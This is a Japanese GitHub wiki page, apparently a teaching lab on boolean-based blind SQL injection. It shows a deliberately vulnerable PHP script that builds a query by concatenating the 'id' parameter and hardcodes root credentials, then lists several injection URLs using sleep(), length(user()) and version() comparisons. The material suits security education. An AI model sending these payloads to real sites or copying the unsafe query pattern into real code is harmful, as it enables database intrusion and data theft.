SQLインジェクション 03 - yujitounai/helloworld GitHub Wiki

SQLインジェクション-03

booleanベースのSQLインジェクション

脆弱なソースコード (PHP)

<?php
function connectDB(){
    $dbserver = "mysql:host=mysql; dbname=vuln; charset=utf8";
    $dbusername = "root";
    $dbpassword = "root";
    try {
        $GLOBALS['pdo'] = new PDO($dbserver, $dbusername, $dbpassword);
        $GLOBALS['pdo']->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
    } catch (PDOException $e) {
        $msg = $e->getMessage();
    }
}
if(isset($_GET['id'])){
    connectDB();
    $id = filter_input(INPUT_GET,"id");
    try {
        $sql = "SELECT * FROM users where id =".$id." limit 1";
        $stmt = $pdo->prepare($sql);
        $stmt->execute();
	    $user = $stmt->fetch();
        if($user['id']){
            echo "<div class=\"main\">id ". $id ." is exist</div>";
        }else{
            echo "<div class=\"main\">id ". $id ." is not exist</div>";
        }
    } catch (PDOException $e) {
        $msg = $e->getMessage();
    }
}else {
    echo "usage: ?id=1";
    echo "<br>";
    highlight_file(__FILE__);
}
?>

攻撃方法

/users/user.php?id=2-sleep(1)

/users/user.php?id=20-length(user())

/users/user.php?id=7-if(version()%20like%20concat(0x3825),1,0)

/users/user.php?id=7-if(version()%20like%20concat(0x382e302e3330),1,0)

/users/user.php?id=7-if(version()=concat(0x382e302e3330),1,0)

⚠️ **GitHub.com Fallback** ⚠️